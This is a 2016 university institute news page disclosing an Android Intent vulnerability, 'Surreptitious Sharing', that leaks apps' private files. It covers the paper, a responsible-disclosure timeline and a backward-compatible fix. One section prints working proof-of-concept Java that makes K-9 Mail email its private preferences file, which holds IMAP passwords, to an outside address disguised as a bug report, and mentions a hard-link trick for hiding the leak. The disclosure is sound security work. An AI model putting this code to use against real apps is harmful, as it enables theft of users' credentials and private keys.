Technische Universität Braunschweig
  • Study & Teaching
    • Beginning your Studies
      • Prospective Students
      • Degree Programmes
      • Application
      • Fit4TU
      • Why Braunschweig?
    • During your Studies
      • Fresher's Hub
      • Term Dates
      • Courses
      • Practical Information
      • Beratungsnavi
      • Additional Qualifications
      • Financing and Costs
      • Special Circumstances
      • Health and Well-being
      • Campus life
    • At the End of your Studies
      • Discontinuation and Credentials Certification
      • After graduation
      • Alumni*ae
    • For Teaching Staff
      • Strategy, Offers and Information
      • Learning Management System Stud.IP
    • Contact
      • Study Service Centre
      • Academic Advice Service
      • Student Office
      • Career Service
  • Research
    • Research Profile
      • Core Research Areas
      • Clusters of Excellence at TU Braunschweig
      • Research Projects
      • Research Centres
      • Professors‘ Research Profiles
    • Early Career Researchers
      • Support in the early stages of an academic career
      • PhD-Students
      • Postdocs
      • Junior research group leaders
      • Junior Professorship and Tenure-Track
      • Habilitation
      • Service Offers for Scientists
    • Research Data & Transparency
      • Transparency in Research
      • Research Data
      • Open Access Strategy
      • Digital Research Announcement
    • Research Funding
      • Research Funding Network
      • Research funding
    • Contact
      • Research Services
      • Academy for Graduates
  • International
    • International Students
      • Why Braunschweig?
      • Degree seeking students
      • Exchange Studies
      • TU Braunschweig Summer School
      • Refugees
      • International Student Support
    • Going Abroad
      • Studying abroad
      • Internships abroad
      • Teaching and research abroad
      • Working abroad
    • International Researchers
      • Welcome Support
      • PhD Studies
      • Service for host institutes
    • Language and intercultural competence training
      • Learning German
      • Learning Foreign Languages
      • Intercultural Communication
    • International Profile
      • Internationalisation
      • International Cooperations
      • Strategic Partnerships
      • International networks
    • International House
      • About us
      • Contact & Office Hours
      • News and Events
      • International Days
      • 5th Student Conference: Internationalisation of Higher Education
      • Newsletter, Podcast & Videos
      • Job Advertisements
  • TU Braunschweig
    • Our Profile
      • Aims & Values
      • Regulations and Guidelines
      • Alliances & Partners
      • The University Development Initiative 2030
      • Foundation University
      • Facts & Figures
      • Our History
    • Career
      • Working at TU Braunschweig
      • Vacancies
    • Economy & Business
      • Entrepreneurship
      • Friends & Supporters
    • General Public
      • Check-in for Students
      • The Student House
      • Access to the University Library
    • Media Services
      • Communications and Press Service
      • Services for media
      • Film and photo permits
      • Advices for scientists
      • Topics and stories
    • Contact
      • General Contact
      • Getting here
  • Organisation
    • Presidency & Administration
      • Executive Board
      • Designated Offices
      • Administration
      • Committees
    • Faculties
      • Carl-Friedrich-Gauß-Fakultät
      • Faculty of Life Sciences
      • Faculty of Architecture, Civil Engineering and Environmental Sciences
      • Faculty of Mechanical Engineering
      • Faculty of Electrical Engineering, Information Technology, Physics
      • Faculty of Humanities and Education
    • Institutes
      • Institutes from A to Z
    • Facilities
      • University Library
      • Gauß-IT-Zentrum
      • Professional and Personnel Development
      • International House
      • The Project House of the TU Braunschweig
      • Transfer Service
      • University Sports Center
      • Facilities from A to Z
    • Equal Opportunity Office
      • Equal Opportunity Office
      • Family
      • Diversity for Students
  • Search
  • Quicklinks
    • People Search
    • Webmail
    • cloud.TU Braunschweig
    • Messenger
    • Cafeteria
    • Courses
    • Stud.IP
    • Library Catalogue
    • IT Services
    • Information Portal (employees)
    • Link Collection
    • DE
    • EN
    • IBR YouTube
    • Facebook
    • Instagram
    • YouTube
    • LinkedIn
    • Mastodon
Menu
  • Organisation
  • Faculties
  • Carl-Friedrich-Gauß-Fakultät
  • Institutes
  • Institute of Operating Systems and Computer Networks
  • News
  • IBR News
Logo IBR
IBR Login
  • Institute of Operating Systems and Computer Networks
    • News
    • About us
      • Whole Team
      • Directions
      • Floor Plan
      • Projects
      • Publications
      • Software
      • News Archive
    • Connected and Mobile Systems
      • Team
      • Courses
      • Theses
      • Projects
      • Publications
      • Software
      • Datasets
    • Reliable System Software
      • Overview
      • Team
      • Teaching
      • Theses & Jobs
      • Research
      • Publications
    • Algorithms
      • Team
      • Courses
      • Theses
      • Projects
      • Publications
    • Microprocessor Lab
    • Education
      • Summer 2025
      • Winter 2024/2025
      • Theses
    • Services
      • Library
      • Mailinglists
      • Webmail
      • Knowledge Base
      • Wiki
      • Account Management
      • Services Status
    • Spin-Offs
      • Docoloc
      • bliq (formerly AIPARK)
      • Confidential Technologies
    • Research Cooperations
      • IST.hub

Surreptitious Sharing on Android

Dominik Schürmann found a vulnerability present in many Android communication apps

Many email and messaging apps on Android utilize the Intent API for sending files shared from other apps such as Android's gallery. These Intents are standardized for sending and receiving content. Instead of sending entire files, such as videos, via this API, only URIs are exchanged pointing to the actual storage position. We found a vulnerability in this Intent API, which is present in many published communication apps allowing privilege escalation and data leakage. In the worst case, this can possibly leak private keys stored by popular encrypted messaging apps, such as Threema, Telegram, or Signal.

While private app storages are separated via Unix file permissions, apps can always access their own private files. Thus, a malicious app can share a URI using the file scheme that points to a private file of the receiving app. Many apps, such as email and messaging clients, accept these URIs and offer to send their own private file to communication partners. We call this vulnerability Surreptitious Sharing. In this blog post, we give a short overview of how it can be exploited in practice and provide a backward compatible library as a countermeasure.

Details

The main issue lies in the fact that apps cannot only access their private data directories using Context.openFileOutput(String name, int mode), but also using file URIs. While these URIs are normally used to access files on the SD card, via file:///sdcard/paper.pdf for example, they can also point to private files, e.g., file:///data/data/com.example.app/files/paper.pdf. If an app registers Intent Filters to support Android's sharing API or defines custom Intents accepting URIs, they are potentially accepting file URIs that could also point to their own private files. For apps facilitating communication, like email or messaging apps, this leads to what we call Surreptitious Sharing. To our knowledge, a similar issue has first been documented as vulnerability OKC-01-010 in Cure53's security audit of the OpenPGP app OpenKeychain. While their report applies this issue to the file encryption API in OpenKeychain, we apply it in a broader context to communication apps. Investigating the AOSP source code reveals that support for file URIs using Context.openFileOutput(String name, int mode) (similar checks are present in openAssetFileDescriptor) was planned to be removed (see inline comments in openInputStream method in ContentResolver).

Research Paper

A pre-published version of our research paper, presented on GI Sicherheit 2016, is available as schuermann-sicherheit2016.pdf. In this paper we analyze 4 email and 8 messaging apps in detail and found that 8 out of 12 apps are vulnerable.

Example Exploitation

This example is intended to surreptitiously share IMAP passwords of K-9 Mail with an attacker. Please note that K-9 Mail serves only as an example, the issue has already been fixed in the current release and was present in many more apps, as discussed in our research paper. As shown by the screenshots, a malicious app could show a screen indicating that a problem has occurred urging the user to report the bug to the developers. Touching the button starts a malicious Intent specially crafted for a particular email client with an URI pointing to a private file of this email app, containing the IMAP password.

The code required to execute this attack follows:

Intent i = new Intent();
i.setComponent(new ComponentName("com.fsck.k9", "com.fsck.k9.activity.MessageCompose"));
i.setAction(Intent.ACTION_SEND); i.setType("text/plain");
Uri uri = Uri.parse("file:///data/data/com.fsck.k9/databases/preferences_storage");
i.putExtra(Intent.EXTRA_STREAM, uri);
i.putExtra(Intent.EXTRA_TEXT, "Hello World");
i.putExtra(Intent.EXTRA_EMAIL, new String[]{"support@company.com"});
i.putExtra(Intent.EXTRA_TEXT, "Dear support team,...");
i.putExtra(Intent.EXTRA_SUBJECT, "Bug Report");

To make it more difficult for a user to detect this data leakage and to circumvent protection mechanisms in GMail, a hard link can be created and named "bug-report" for example (details are available in the paper). In the paper, we stated that "However, we were not able to exploit GMail on Android 6, maybe due to the new runtime permissions; this has not been investigated further.". In discussions with Google engineers, it became clear that the hard link could indeed not be created on Android 6 but due to new SELinux policies. This can be reproduced by connecting to a Android device via adb shell and then observing the output of dmesg | grep avc.

Countermeasure

We provided a fix for app developers that checks with fstat if a file is owned by the receiving app only and then prevents the opening of it. Due to the requirement of using fstat our Java fix was only available for Android >= 5, but thanks to cketti, the lead developer of K-9 Mail, a library has been created for backward compatibility. We strongly recommend to use this library to fix the issue in your app: https://github.com/cketti/SafeContentResolver.

Android N

As noted in Commonsware's blog, support for the file scheme has been removed in Android N Developer Preview. We don't know if this has been done as a response to this vulnerability, but we suspect this change was already planned before we reported the problem, as comments inside AOSP source code already indicated upcoming changes. Commonsware provides great blog posts how to consume and provide file access over content URIs.

Responsible Disclosure

  • 2016-01-29 Informed Google via AOSP's bug tracker (non-public bug report)
  • 2016-02-01 Informed developers of evaluated vulnerable apps: K-9 Mail, WEB.DE Mail, Skype, Threema, Signal, Telegram (except GMail, AOSP Mail, which are maintained by Google)
  • 2016-04-04 Public disclosure via blog post
  • 2016-04-06 Presentation on GI Sicherheit 2016
We like to acknowledge that the developers of K-9 Mail, WEB.DE Mail, Threema, and Telegram answered very fast while no response has been received from Microsoft. Thus, Skype is still vulnerable. It is important to note that we only informed developers of apps, which have been explicitly evaluated in our paper. The issue is definitely present in many more apps besides the discussed ones.

Acknowledgments

  • Cure53 for discovering a similar issue in OpenKeychain, OKC-01-010
  • cketti and 1 & 1 Mail & Media Development & Technology GmbH for developing a backward compatible fix
  • Thanks for the bug bounties by Google and Telegram

Contact

If you have more question, please contact Dominik Schürmann.


last changed 2016-04-04, 15:03 by Dr. Dominik Schürmann

For All Visitors

Vacancies of TU Braunschweig
Career Service' Job Exchange 
Merchandising

For Students

Term Dates
Courses
Degree Programmes
Information for Freshman
TUCard

Internal Tools

Glossary (GER-EN)
Change your Personal Data

Contact

Technische Universität Braunschweig
Universitätsplatz 2
38106 Braunschweig

P. O. Box: 38092 Braunschweig
GERMANY

Phone: +49 (0) 531 391-0

Getting here

© Technische Universität Braunschweig
Imprint Privacy Accessibility